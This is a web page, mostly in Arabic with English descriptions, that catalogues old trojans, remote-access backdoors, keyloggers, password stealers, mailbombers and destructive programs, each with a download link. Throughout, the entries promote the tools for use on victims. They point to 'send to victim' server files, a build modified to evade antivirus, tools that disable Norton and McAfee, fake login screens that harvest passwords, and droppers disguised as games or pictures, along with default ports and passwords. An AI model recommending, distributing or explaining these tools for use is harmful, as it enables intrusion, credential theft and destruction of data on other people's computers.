قائمه البرامج مرتبه حسب الاحرف بامكانك مراجعه صفحه المنافذ لكي تعرف منفذ كل برنامج |
||
Prog Name | Prog ExplaiN |
download |
Absturz |
برنامج الالمانى يقوم باغلاق الجهاز مباشره عنده فتحه |
DownLoad |
AcidShiver+sources |
برنامج اختراق قديم جدا |
DownLoad |
Admin.Troj.Kikzyurarse |
يعطيك اي ميزه تريده في وندوز الانتى |
DownLoad |
Ambush |
برنامج جديد للباك دور |
DownLoad |
AolTrojan1.1 |
يعتبر من اقدم التراجونات بامكانك معرفه رقم المنفذ من قائمه بورتات الموجوده |
DownLoad |
Asylum
0.1 Asylum 0.11 Asylum 0.12 Asylum 0.13 Asylum Mini 1.0 Asylum Mini 1.1 |
هذا برنامج اختراق مع جميع اصدراته وتم تعدليه في النسخه الثالثه بامكانك ايضا مراجعه القائمه الرئيسيه الخاصه بارقام البورتات للتعرف علىرقم البورت الخاص لجميع الاصدارات |
DownLoad |
Attack FTP |
يقوم بتحميل سيرفر الاف تي بي في الباك قراوند |
DownLoad |
Back Construction 1.2 |
برنامج اختراق بسيط يقوم بعمل أبلود و داون لود لجهاز الضحيه انظر لرقم المنفذ في القائمه |
DownLoad |
Back Construction 1.5 |
اصدار اخرى من نفس البرنامج الذي يخترق الاف تي بي ويقوم بعمل داون لود وابلود |
DownLoad |
BackConstruction 2.1 |
الاصادر الجديد المطور من نفس البرنامج |
DownLoad |
BackDoor v2.01 |
يعتبر من أقوى واقدم برامج الاختراق |
DownLoad |
BackDoor v2.03 |
الاصدار الجديد من نفس البرنامج |
DownLoad |
Backdoor.c |
يونيكس باك دور |
DownLoad |
Bla |
من التراجونات الفرنسيه جربه ترا ماادري عنه بس انظر لرقم البورت فالقائمه |
DownLoad |
Bla (2.0) |
النسخه الحديثه من نفس البرنامج السابق |
DownLoad |
Blazer5 |
برنامج اختراق يعطيك مميزات في الاطلاع على ملفات الضحيه وتحميل وتنزيل ملف وعمل رن له منفذ السيرفر هو البورت رقم 5000 |
DownLoad |
Bo 1.20 R |
برنامج روسي |
DownLoad |
BO2 More Info |
أصدار اخرى من نفس البرنامج السابق ولكن لوندوز الان تي |
DownLoad |
BOBOv1.0 |
أصدار جديد من الويرد |
DownLoad |
Bugs |
*** |
DownLoad |
Connection |
برنامج اختراق فعال قد يأتى الباتش تبعه على شكل فيروس يدمج مع اي ملف |
DownLoad |
Cain 1.51 More Info |
برنامج يقوم باختراق منافذ المشاركه ( شيرنق) قوي ورهيب |
DownLoad |
Cain1.5 |
احد اصدارات البرنامج السابق |
DownLoad |
Canasson |
برنامج اختراق من تصميم فرنسي |
DownLoad |
Coma |
برنامج اختراق من مميزات جديده |
DownLoad |
Datlikller |
برنامج يهعطل وظيفه عمل النورتن والمكافي بذلك لا تستطيع البحث عن الفيروسات . خطير جدا يجب استعماله بحذر |
DownLoad | |
Drat
1 |
برنامج اختراق باستطاعتك معرفه رقم البورت التابع له من القائمه |
DownLoad | |
Freak
88 |
- DDoS based up-on the same idea as Trin00. This Windows Program can connect to upto 3 servers from which it can launch DoS attacks (ping flood) against remote targets. |
DownLoad | |
Der Spaeher 3 |
Der
Spaeher went International |
DownLoad | |
deepthroat3 |
برنامج اختراق شهير وسهل الاستخدام |
DownLoad | |
DEEP THROAT 3.1 |
برنامج اختراق شهير وسهل الاستخدام |
DownLoad | |
Deep Throat v2 |
نفس البرنامج السابق ولكن نسخه اقدم من اللى فوق |
DownLoad | |
Deep Bo GUI v0.6 |
من اقدم برامج الاختراق المعروفه |
DownLoad | |
DeepThroatv1.0 |
الاصدار الاول من الديب ثروت |
DownLoad | |
Delta Source0.5 |
أحد انواع التراجونات انظر لرقم البورت التابع له في القائمه |
DownLoad | |
Delta Source 0.7 Info |
نسخه مطوره من البرناج السابقه اليك معلومات عنه |
DownLoad | |
Devil |
برنامج اختراق فرنسي |
DownLoad | |
Doly Trojan 1.6
|
من احد الترجونات الشهيره سهل الاستخدام |
DownLoad | |
Doly1.6 Cleaner |
يفوم بتنظيف الجهاز الماصاب بباتش البرنامج السابق |
DownLoad | |
Doly15.zip |
أحد اصدارته القديمه |
DownLoad | |
Doly15setup.zip |
نفس السابق |
DownLoad | |
Dolyt15.exe |
نفس السابق |
DownLoad | |
DT 3.1 Secure_Server3.1 |
أيضا من برامج الاختراق الفعال وهذا السيرفر التابع له |
DownLoad | |
DUT |
من البرامج التى تقوم بارسال باسورد واليوزرنيم الى ايميلك |
DownLoad | |
EPS 1.6 |
نفس وظيفه البرنامج السابقه ولكنه اسهل بكثير |
DownLoad | |
Fake Program1 1.6 (Server) | no comment | DownLoad | |
Only the Client1.6 | no comment | DownLoad | |
Readme.txt |
شرح للبرنامج السابق |
DownLoad | |
ReadMeNow!!!.txt |
شرح لبرنامج دولي تراجون الاصدار 1.2 وطريقته |
DownLoad | |
Send_to_victim.zip |
سيرفر البرنامج السابق انتبه |
DownLoad | |
Send_to_victim2.zip |
سيرفر البرنامج اعلاه كذلك |
|
GR
Beta |
تراجون بسيط جدا يخترق الاف تي بي ستجد شرح له مرفق معه يوضح طريقه الاختراق بالتفصيل |
DownLoad |
GateCrasher 1.0 MUST READ | no comment | DownLoad |
GateCrasher 1.1 Final info | no comment | DownLoad |
Gatecrasher v1.2 | no comment | DownLoad |
GayOL1.6 |
- - GayOL 1.6 A FULLY featured Trojan aimed at AOL users. Multiple unique features you have probably never seen before. A downside is that it's done in VB and therefore needs the clumsy DLL's. | DownLoad |
GayOL |
- GayOL is AOL "enhanced" You can use GayOL 1.0 to Open Windows on the user's screen such as the Mailbox and anything on the toolbar, Read and takeover all their Instant Messages, Read and takeover their chat rooms, Retrieve their AOL passwords, send IMs, go to keywords, go to and room bust chat rooms, write mail.... | DownLoad |
Gb2.zip |
برنامج اختراق النت باس مع كل العده الخاصه فيه من كسرباوسورد وفلود |
DownLoad |
Gilrfriend 1.3 | - Girlfriend 1.3. Password Specialist, integrated offline keylogger with password sensitive grabbing method More Info (381Kb) | DownLoad |
Girlfriend 1.35 Sources | - Yes! The GF135 sources (Delphi). Learn how to write an A+ Password logger and a lot more. | DownLoad |
GirlFriendv1.35 Mod | - Modified version to slip through AV detection. | DownLoad |
GirlFriendv1.35 | - Great to get passwords has an nice offline Keylogger and an easy to use File-Manager . | DownLoad |
Host
Control 2.6DownLoad Host Control 2.6 B |
- Backdoor which uses a method of copying the needed mswinsck.ocx to the $system directory to avoid the mswinsck.ocx error message. Therefore it drops ocxreg.bat which makes sure that mswinsck,ocx get's correctly registered. Comes in two parts Setup.exe and dat.dat. This Backdoor uses (exploits) the common Problem in AnitVirus Programs, it copies itself to c:\recycled which usualy DOES NOT gett scanned by AV Programs. Failed to so as I don't have static dir named c:\recyled, wooh i'm l33t | DownLoad |
Hack'a'tack
1.20 TE |
-What's
new: Logged password stealer improved Decryption of ICQ99b passwords added Server icon is changeable now Error message generator added to Server Private messages improved in Client chat Speed of the about box raised up Server Online Notification added to Client Connect to Servers by double-clicking them in the list and some other patched that are not mentioned here.... |
DownLoad |
Hack'
a' tack 1.20 |
- What's New ? - Decryption of
cached system passwords |
DownLoad |
Host Control 1.0 | - Backdoor which uses a method of copying the needed mswinsck.ocx to the $system directory to avoid the usual "mswinsck.ocx not found" error message. | DownLoad |
Hack'a'tack | - Trojan with Basic Features: Send Messages,FTP,Getpasswords,keylogger,build in IP Scanner.. etc. Special thanks to AlaCraN . | DownLoad |
Hack99 | - Acts as a trojan who's only function is to log keys, connect to victim and see what they are typing. | DownLoad |
Hackattack 1.12 |
- Newest Version of the Hack'a'tack Trojan. Submitted by Maverick |
DownLoad |
Hacker's Paradise | - Older version of Above | DownLoad |
Happy 99 |
- After thinking over and over again if I should upload it Here it is... Removal ww.avp.com (Don't spread it please). Neitherway I had it already in my archive it was submited by VGrep |
DownLoad |
HVL RAT. 5.3.0 |
- Client + Server; Changes : Added Nuke Drive feature, Added Show & Hide AOL Feature, Improved mailing system & IP Check, Optimised the Client for 640 X 480 Res. Added GUI Strap on the Client for Sending Quick Commands. Improved Chat SPY - Now Splits Merged lines. Added Timeouts to some features. Removed Registry Setting so the computer will load correctly after Infection. |
DownLoad |
Patcher | - Patcher to be used with HVL RAT. Hardcodes the E-mail adress into the EXE. | DownLoad |
Illusion mailer |
-Finally some new ideas coming. This Trojan can be used to easily send Mail which bounces of the server, and thus showing the IP of the Trojaned System. | DownLoad |
Incommand 1.0 |
- Trojan based on the Bladerunner Sources . | DownLoad |
Incommand 1.2 | - Newest version of Incommand, with new nice features inside. | DownLoad |
Incommand1.3 | - Incommand 1.3 is back and better than ever. Several enhancements were made, as in 1.2 it is skinnable, and has several new features. | DownLoad |
Incommand1.4 | - Newest version of Incommand. Several functions were added. | DownLoad |
IndocTrination v.1 | - E-Mail sendin Trojan. Mails you -Computer Information -System Information -Drive Information -Network Information -ICQ Information -Outlook Express Information . Very Small. | DownLoad |
Inet 2.0 | - Password sending Trojan. Needs physical access to the PC (Icafe) or some Social Engeneering skills. | DownLoad |
Inet 2.0 Newer Version | - Password sending Trojan. Needs physical access to the PC (Icafe) or some Social Engeneering skills. Newer Version | DownLoad |
|
-Alpha version of an Basic Trojan |
DownLoad |
ini Killer 2 | More of a destructive trojan than a Remote Access Trojan needs winsck.ocx Which is in the misc section under files needed | DownLoad |
Insane Network 4 | - A modification by SuiDFlow to the XTCP Backdoor from Shadow Penguin Security. | DownLoad |
Intruse Pack 1.27 | - Quite basic backdoor. | DownLoad |
Ipxctrl |
- Remote Node Control Utilityfor the IPX protocol. 2 Parts the Client and the server, the Client can send keys to the server and the server sends the keys pressed on the remotepc back to the client. IPX only. Written in TurboC. Submitted by MasterRat |
DownLoad |
IPXKCR | - USES 32 BIT OPCODES!! the program records keystrokes and the time between them in the background and sends them to another station over an IPX network. | DownLoad |
IRC - 3 | - Claims to install some IRC "hacking" soft, but in reality drops ServU, which from then on runs hidden on startup. You may call it an FTP Backdoor. | DownLoad |
KCR | - USES 32 BIT OPCODES!! the program records keystrokes and the time between them in the background and then saves them into a file at a later time. | DownLoad |
Mini-Command1.2 | - Mini version of Incommand, server size is 50k. | DownLoad |
PLAYKCR | - The program emulates the keystrokes recorded with KCR. | DownLoad |
JammerKillah 1.2 |
- It kills Jammer (Anti Trojan Program) from memory (not tested) and installs a Modified BO server in the Backround (tested). Back Orifice server port : 121 pass : hack 'Made by Sneaker17 |
K2pS |
يقوم بارسال الباس ورد اللى فجهاز الضحيه الى ايميليك |
DownLoad |
K2tl-Tloader | - Trojan spawning Programs ?؟ | DownLoad |
Khaled |
- A Worm which drops/modifies script.ini and installs a BO server (variant) in the backround and displays a picture of khaled mardem beys face
|
DownLoad |
Kuang2 veryLite | -
Kuang2 veryLite can find Internet usernames & passwords in most
cases. It is designed to be used like a plugin for any Internet
backdoor.
|
DownLoad |
Kuang 2.0 | -
Trojan + Backdoor which mails you the IP etc upon start. (Configurable
smpt etc). BIG thanks to Master
Splinter. Keep them coming.
|
DownLoad |
Kuang2 loggerAS v0.10
|
- Weird strikes back. This trogan logs all target keystrokes and windows manipulation and sends all data back to you. Use it like 'Kuang2 pSender'. >>Setup Program 'Kuang2 loggerAS'. Here is switches description: Log Windows content - it logs max 512 bytes of every window it can find recursive child search - logs *all* childs (not only top childs) only edit controls - log only edit fields only passwords - log only password fields Log extended keys - log keys like |
|
Kuang2 pSenderFULL v0.30 |
برنامج ارسال باس ورد قوي قودي جدا يقوم بارسل اي باس ورد يكتبها الضحيه على جهازها سواءا خزنها ام لم يخزنها على الجهاز
|
DownLoad |
Kuang2 pSenderFULL v0.34 |
الاصدار الجديد من البرنامج السابق
|
DownLoad |
Kuang2 pSenderv0.20 | no comment | DownLoad |
Kuang2 tLoader Setup v0.10 | - Kuang2 tLoader is a universal carrier for any virus (or program). It will start an external program whenever user run tLoader. Coded by Weird | DownLoad |
Kuang2 tLoaderv0.10 | no comment | DownLoad |
Kuang2 tLoaderv0.20 | no comment | DownLoad |
Kuang2 tLoaderv0.30 | no comment | DownLoad |
Kuang2 veryFun v0.12 |
برنامج بسيط جدا من خلال تستطيع المرح مع الضحيه بحركات نص كم |
DownLoad |
Kuang2veryLite v0.17a | - Able to find Internet usernames & passwords in most cases. It is designed to be used like a plugin for any Internet trojan horse. (like BackOrifice, NetBus...), but, of course, you can use it as Standalone. Coded by Weird | DownLoad |
LameSpy | - A backdoor by MatZe (Xrated Software) | DownLoad |
Logged ! | - Logged is a Realtime Remote Keylogger for Windows9x/NT, which also gives you full information about the targeted System. | DownLoad |
Mosucker | - Backdoor coded in Vb6 and as suchs needs the run-time dll's,neitherway it has some interesting features... | DownLoad |
Malicous
aka Trojan's Best Friend |
- This program will disable the [Find] function so the trojanised-victim can't use the [Find] function to find out the real filename of the executable and then proceed to use MS-Dos to delete the executable. It will also disable the use of RegEdit.exe so that if the trojan he/she had run uses the method of writing a key to 'Run' or 'RunServices' to auto-execute the executable upon reaching Desktop, the key could not be removed and neither can he/she know the filename after locating the registry key. The effects will only take place after a reboot so simply use the trojan's controller to reboot the victim's system to set the trap | DownLoad |
MasterParadise | - A great trojan a bit buggy and pron to crashing but good never the less. Unfortunately the author has gone the way of the NetBus author and made the new version servers visible | DownLoad |
Maverick's
Matrix1.4 |
- Trojan basing on the Girfriend Sources. Neitherway several options have been added like an FTP Server, or an Update Function. Author Maverick |
DownLoad |
Maverick's
Matrix 2.0 |
- Started as a modifcation to the Girlfriend sources, it slowly expands to smth more.. Author Maverick |
DownLoad |
MBT |
- This Trojan Silently sends multiple E-mails at a high speed to an specific E-mail Account (Read: Mailbomb) in the backround . |
DownLoad |
Metropolitan |
no comment |
DownLoad |
Millennium v1.0 |
تراجون حديث بمواصفات حديثه |
DownLoad |
MSN Cookie
|
- The idea behind this program is for it to be used in conjuction with a remote access trojan. It fools an unsuspecting user into suppling you with their confidential Hotmail information. In a very convincing manner, it warns the user that their Hotmail Session expired, and that have to enter the info again. This information will then be saved to the H.D. |
DownLoad |
Trojan |
Description |
Naebi
2.12 Naebi 2.14 Naebi 2.15 Naebi 2.15b Naebi 2.16(cracked) Naebi 2.17 Naebi 2.19 Naebi 2.20 Naebi 2.26 Naebi 2.27 Naebi 2.30 Naebi 2.31 Naebi 2.32 Naebi 2.33 Naebi 2.34 Naebi 2.40 |
-Russian Trojan. Including but not limited to these features: Small size (12Kb) Works with 95/98/NT/2000 It sends: all dial-ups passwords together with phone#s & scripts Passwors stored in PWL Password for shares (self and saved other) CuteFtp passwords Passes to ALL icq UINs E-type.InI (decryptor added) Bo,Netbus,Netspere passes & ports This trojan CAN add itself to other files . |
NCW | - Russian Trojan. NEED a decent description for this one. Send it to me Thanks! |
NetController |
-Backdoor similar to Netbus which uses port 6969 as default. The server needs to be started from the C drive else the installation will fail. Netsrvr /noreload does not register the autrun key thus it will not run on restart. Netsrvr /remove does kill it from memory and remove the keys. Netsrvr /port123 installs NetServer on port 123 (it substitutes 123 for the port of your choice). |
Netadmin |
-An other release from the TrojanSpirit Author. |
Net Metropolitan 1.04 | - Nice Backdoor. "Why go by Bus when you can take the Metropolitan" |
NetMonitor: NetSpy | |
Netraider | - Netraider's Server size is 5.021bytes and comes with full Source Code. |
NetSphere | - New Trojan with never seen functions. |
NetSphere 1.33137 | - The FINAL Version of Netsphere. There will be no more Updates. A Pity. |
NetSpy | |
Netspy 2.0 | - NetSpy is Back, more functions, better stability |
Novell 3.x Fake Password Storer | - (or is it genuine :) Needs to be compiled. |
- Noob is an HTML Mirc Infector (based on VBScript and activeX, only local), creating a backdoored Noobini.ini, which can be controled over IRC by issuing /ctcp commands... read more | |
Novell Login | - Fakes a Novell Login Screen. Saves Password and Login name to c:\os31337 |
NT Remote Controller 2000 |
- Remote Administartion Tool for NT. Submitted by MasterRat. |
OpC_Bo20 | - Opc_Bo20 is a modified BO server + a modified ButttrumpetPlugin, comes with the BeoneGui and a BO help file. |
OpC_BO | - Bo Server. (Compressed) |
-OOTLT aka One Of the Last Trojans. The best about this Trojan is that it comes with FULL Source Code. Author Sneak | |
OOTLTV.(C)
|
-Modifications
by Cart
to the OOTLT Project: - Modified interface - Some (little) Bugs fixed ;-) - about connection - about commands - Allow multiple hosts... - Lighter (Only 1 form per project) - Uses Mswinsck.ocx instead - Compiled in VB5 Source Link Fixed |
PcCrasher | - Portuguese backdoor |
Prosiak 0.70 | - A backdoor with potential, full of new ideas and fully configurable. The Install Shield Option generates a fake "Install shield" dialog which can (optionaly) display an error message once a specific percantage of the installtion is reached.... |
PC Explorer 1.2 | - Telnet Server. |
Phase 0 Public Beta | - Trojan with basic Functions. |
Phase Zero ver1.1 Server | - phAse zero win32 server ver. 1.1a by njord of kr0me corp. [PRE-RELEASE] |
PhAse-0 v1.1 | p |
Phineas Trojan | p |
Picture Trojan | - Exe displaying an Image and installing Leentech modified Bo server in the backround. |
Picture Trojan | - an Netbus 1.7 Dropper (again). I got an "Unable to resolve IP adress Error" (Due to bug in the Binder) |
Picture Trojan (NetbusPro2) | - Fake Image Viewer installing an hidden NetbusPro2 Server (donno if Logging is disabled though) |
Picture Trojan2 | - Exe displaying an Image and installiing the netbus1.7 server in the backround. |
PieBillGates | - Fake Game -> Netbus1.x dropper Info |
Portal Of Doom beta | Written CeF from hackcity |
Printer Spitter v.9 | - Spits out paper of the printer and and a little line dances around in the MS-Dos window (harmless) |
Priority Beta + SourceCode | -
(VB) Thanks Zemac for the submission. www.dark-e.com |
- Uploaded just to
complete the Progenic Series. Text command based Trojan
|
|
- Uploaded just to
complete the Progenic Series. Text command based Trojan
|
|
Progenic Mail Beta | - Trojan Mailing you the cached Passes. Info |
Progenic Mail Trojan 1.0 | - PSW Trojan with step by step configuration and TIM (Trojan installation Modules) upgradability. 'Note E-mail Address is Not Encrypted in the EXE. (Offset: 00009728 Unicode). Author PROGEN |
Progenic Trojan V1 | - Xela's newest trojan. Text based Commands Info (137Kb) |
Prosiak 047 | - Good russian Trojan with lot of options . Never seen functions like ;rename caption of Windows; ScreenEffects ; Read and write into the Clipboard etc... It also give you the chance to connect through a Proxy (+Wingate) to cover your tracks. Nice, the only Trojan letting you do this besides NetbusPro. |
Psycho's Nightmare | - Desctructive Trojan. Displaying a Form with Several Buttons on it. Moving the Mouse over one of the Several Buttons will trigger delete/Format functions. Workaround ALT+F4 Author Psycho aka Armer Irrer |
Remote
Hack 1.1 |
-
Pretty basic. Well it's a description ? I am tired ow writing "it
has the unique ability to open your cd-rom drive" ;) An
alternative to the client is telnet. |
|
-
some nice kind of trojan, although it isn't a real one. this prog allows you to securely e-mail bomb. just rename it to your victim's email.exe, and you're on your way. e.g.: lamer@aol.com.exe then give it to anyone, or bind it trojan-like to any .exe file. once run on another machine, it'll start to bomb lamer@aol.com from this computer, allowing you to stay anonymous because the other computer's IP is transmitted with the e-mail, not yours. |
RAT 1.0 | aka Remote Administartion Tool |
RAT 1.1 | |
RAT 2.0 | RAT2.0>>RAT is a very small but extreme powerful program to remotely control a Windows machine you can do whatever you want with your target. Copy rat20.exe to the target computer, run it. It hides itself from the Program list (Ctrl-Alt-Del) and starts to receive commands from the net via UDP. "Enhanced" for use with netcat and IRC. This latest release of the RAT trojan server built up nearly from scratch and has lots of new features, such as extensive file transfer functions. You can use RAT to control other windows computers even if BO or NetBus is not running on them.<< RAT web site * Source Code for The Client (linux) * Plugin |
RipperPro | -
Ripper is a program that can be used to log all of the Dial-Up
Networking accounts on a remote computer. The server is distributed to
the target machine and when executed itlistens for a client connection. |
ROBO |
Senna Spy FTP Server | - Installs a hidden FTP server on a remote machine accesible throught normal Ftp Clients. Comes with full VB Source Code. |
SAMB | - Secure Anonymous MailBomber. Once launched it starts sending out mail out every 3 secondes to a preconfigured Mail-adress over a preconfiguerd Smtp-Server. (Very Buggy) |
Satans Backdoor | - Password Stealing Trojan. Fakes the DUN Dialog. |
SatansBackdoor1.1 | - Newer Version of a Basic Trojan |
Schoolbus 1.6 | - Usual Backdoor, Client/Server Suite. |
Schoolbus 2.0 | -
Newest Schoolbus version, has some very nice options, choose your
icons, fake message, cutsom port
![]() |
Schwindler 1.82 | - Well made Trojan with a GUI à la Netbus. Easy to use. Author Schwindler |
Sd-Rux |
- A very small trojan connecting to a remote ftp account download and running a specific file. Comes as a BAT file but can be compiled as com/exe. |
Secret
Service aka DCH Trojan |
- Basic German Trojan with a very nice GUI, and a very well-made BinderProgram. |
Senna Spy Trojan Generator | - Generates Trojan sources, ready to compile with VB4.0,VB5.0,VB6.0. Has the ability to kill Firewalls,AV software from Memory. -Crippled Sources +Clean Code |
SENNA SPY TROJAN GENERATOR 3.01 | -
What's New ? Removes any new protection software Correct bug in Windows NT version and other bugs Allow integrate any EXE file to trojan - EXE Joiner Automatic Register OCX License Key Allow free access in Private Line New start mode ... Automatic Starting with ICQ NetDetect Homepage |
Serve ME | - Small Trojan which comes with Full Source! (VB). Author Ariz |
ServU | - Full FTP access |
Sesam 1.02 | - Periodically email any type of file (logs or images) automatically to your email account anywhere in the world. (requested) |
SetupTrojan+sources | - Triggers the victim computer into opening Shares to the outside world. Letting you connect to the victim through the Network Neighbor hood or Nbtstat.exe if you can handle it. |
Shadow Phyre | - Uses a different Port Everytime it restarts (can be set to a remain to the same one) Features: Port redirection,Print,webpage etc... It claims To be >>UNREMOVABLE<< . Yeah Ok. Took out my old VB (Yes ^Cold^ VB !:) and wrote a little program which cleans it from Memory and from the HD, so if you have no experience with Trojans Download this one also. SP Cleaner (5 minutes program so don't expect it to be stable,reliable etc) |
ShadowPhyre 2.X |
- What's new in this version? Fear; Shortcuts; Hidden from the Task List; Error message the first time you run it =); Wallpaper; LockStation; Get UIN. |
|
- This program enables file & print sharing if disabled and then activates full sharing on all the logical drives w/o password and w/o limits. Req : The machine u run it on must have installed the sharing support (vxd and so on). Known Bug : System should be rebooted in order to activate the features. |
Sheep | - Cute little sheeps running over your desktop, the Evil Bo installs in the Backround. |
Shit-Heep | - The name suites the program,it actually is. "Your Recycle Bin has been updated" Fake Recycle Bin Update ..lol |
Silencer Trojan | - The Smith Clan Ripped it of from Hackcity. They apparently got their hands on a pre-aplha Release Hex-Edited it to make it look like a Smith Clan Production (If this is true this is the lamest thing to do). Practically NO features |
Socket 23: Control du socket | - French |
Socket 23: Control du socket | - French |
Socket 23: Fiches Techniques | - French |
Socket 23: Patch Anti-Socket | - REG File. |
Socket23 | - Acts like a Virus; loops through the entire Hardisk and infects all Exe, it's quite obvious the HD fills up really fast because of the 220+ K this thing has. As Trojan it's quite old and has built in Icq nuker,scanner etc. Has some neat features. |
SShare | - Improved Version of the Setup Trojan By Brian Enigma. Homepage |
Stealth | - Password Mailing Trojan. Fully configurable, with Hard-coded SmptServers. |
Stealth Older version | - Stealth, E-mail Password sending Trojan....Older Version |
StealthSpyBeta3 | - BetaVersion of a software Product. |
Streaming Audio Server | - Needs a Ton of Ocx,dll's and a REG file to crack the Dll. The source being stolen from the Netmanage activex Sources, just a little bit tampered. Take NetBus you'll get the same audio feature. |
Striker | - A lame trojan that just deletes vital system files. |
Sub Seven 1.3 | - Just to complete the SubSeven Series. |
Sub Seven 1.4 | -Just to complete the SubSeven Series. |
Sub Seven 1.8 | - Bug fixed Version. Get it NOW (-Added Details-) Is Now Skinnable Anybody Submits any Skins ? |
Subseven 1.0 | - Subseven (aka Backdoor-G) |
Subseven 1.1 | - 1.1 Version |
Subseven 1.6 | - Lot of Bugfixes Check this one out! ScreenShots |
SubSeven 1.7 | - All bugs from 1.6 seem to be fixed. A Must. |
SubSeven 1.9 | - Screenshot, Removal Keys and Local Download. |
Subseven 2.0 | - The Latest. Has new way of autostartin build-in, AIM-Crack, ICQ-Crack, ICQ Spy, AIM Spy, Matrix....endless features. |
subseven2old.1 G | its the best of the best hacking prog .too Cool |
Subseven Apocalypse | - Here it is: Subseven Apocalypse. FULL (newest) |
Snid 2x |
- SnidX2 a new Backdoor with lot of features and using a Bind Engine based on Blade's Binder. Has the usual features and lacks the same problem as the Original Binder it creates static Filenames namely TEMP$01.EXE. |
Suck-Info |
- Fake Mirc Updater.>>What the program actually does is that it tells the person behind the pc that there is an update of their chatprogram available. Their EMail address is needed to get a free registration. What the big idea is is that people enter their correct EMail address and things like their ICQ UIN, phone nr. and even their snail address. All info is being saved in c:\windows\pi.ini. It's not a Trojan or something so you can try it out on yer own pc...<< More Info |
System32.exe | - Not much information about this one. The Trojan assesses webpages with the purpose to "make" money for it's author |
TakeDown | - Remote Administration Tool for MAC. It allows you remotely control mac computers. |
Telecommandov1.5.4 | |
th3tr41t0r | - Mirc Worm. Worm sending the comp and user name. (VB 5) Author Darkstar |
The 1-900 Trojan | - Fake Caller Id spoofer who dials 1-900 Numbers in the backround. At least 4$ perCall. More Info |
The Executor | - Executes Victim System by deleting vital system files . |
The Prayer 1.2 | - Portuguese Backdoor. (wooh nice description) ;) |
The Prayer 1.3 | - Version 1.3 of the Portuguese Backdoor. The Author plans to release an elnglish version soon. |
The Spy | - Acts as a trojan who's only function is to log keys, connect to victim and see what they are typing |
The Thing 1.12 |
- The Thing |
The Thing 1.2 |
-you can configure your server's port,password,icq notification and nickname (so you can identify your victim's ) |
The Thing 1.5 |
- The Thing. (40K) Author Blade |
The Thing 1.6 |
- Newest version of The Thing. (8K) Author Blade |
The Thing1.1 | - Small trojan 50k for uploading trojans. Two features : upload and run. By Blade |
The Thing1.11 | - Size Reduced to 30K ! Congrats Blade! |
The Unexplained 1.0 | - UDP Trojan entirerly coded in VB. 12.8 KB. Author: Darkstar If you got runtime errors search for the specific files here. |
TheThief2 | - The Thief is One-Time Password Sender. Sends RAS Details over ICQ. |
Tiny Telnet Server | - Installs a Hidden Telnet Server. |
Total Eclypse 1beta |
- Special Day, Special Trojan. Total Eclypse by Del_Armg0 |
Traitor 2.1 | - When run this program isntalls a hidden FTP Server running on port 21. You may connect to it using any login/password combination. Ftp Banner : "traitor:21 server ready". |
- Download/Upload; Get Icq Password; and more. Has some "special" function called "Burn Monitor", this option constantly resets the Screenresolution. Author Thunder God Updated Details and Removal Keys. Thanks Zemac |
|
Trojan Man | - Small Trojan Binder (Encrypting Engine Included). Win9x and WinNT version. Info |
Trojan Spirit 1.2 | - Bug-Fixed |
TrojanCow | - Newish trojan with limited features - Trojan Cow Webpage |
Trojanit kit |
- "Trojanit kit" is a simple trojan kit for linux and maybe bsd which hides 9 keywords from the common programs in which you can be seen... 'quoted from the readme |
UglyFtp | - Smallest FTP server around, Upload and Execute files on a remote PC |
Ultors Trojan | - Telnet based Trojan |
-Trojan with some good functions. (VB) |
|
- Newest Version of the Vampire Trojan. |
WebEx | |
Webex 1.3 | |
Webex 1.4 | |
Whack Job 1.7 | - Fake Installation of a Game installing the Netbus1.7 server with port set to 12631 and pass to ecoli. More info |
WhackJob 2.0 | - Installs A fake game and a hidden NBP2 server (logs are enabled). Submitted by AlaCraN |
Wincrash 2.0 | - TONS of features too much to describe everything, look at the screenshot you'll see 1/3 of the features. ScreenShot |
Wincrash 1.03 | - Nice GUI and it works well. Keep an eye on future versions. |
Wyrvious's Invisible Mailer 1.1 | - Info (743Kb) |
Xanadu 1.1 | - Exclusive TL release Xanadu 1.1 What's new : Bugfixes...new features If you want a program to run when the server starts, rename a file to 'data.z' and put in the same folder as the server and then execute on someone's PC. The server now melts on execution. |
X-TCP 2.01 | - UNYUN from Shadowpenguin Security came up with a newer version of XTCP; binds a shell to port 5550 (FULL Source included) |
xtcp | - Win32 Trojan made by a Japanese group called ShadowPenguin Systems Inc. Very small and usefull Trojan. Can be Controled by Telnet. Translation Included. |
Y3k |
- Backdoor coded by Chucky & F i r e l a r m |
Yat |
-
Yet Another Trojan. A very innovative backdoor, not by it's features which are also great, but with the method of autostarting, it makes multiple backups of itself (filename + pathname configurable) and checks on re-start if it exist, if not, it re-installs itself using the backups. This backdoor is _very_ configurable,every aspect of it Filename, port, backups, irc, pass, deletion of special files on start, etc. |
Yahoo! | - Based on the idea of Fake Novell Login. It asks for the info (user and pass) and after entered it will store the info entered in winsys.dll in the C:\Windows directory as plain text. Darkside |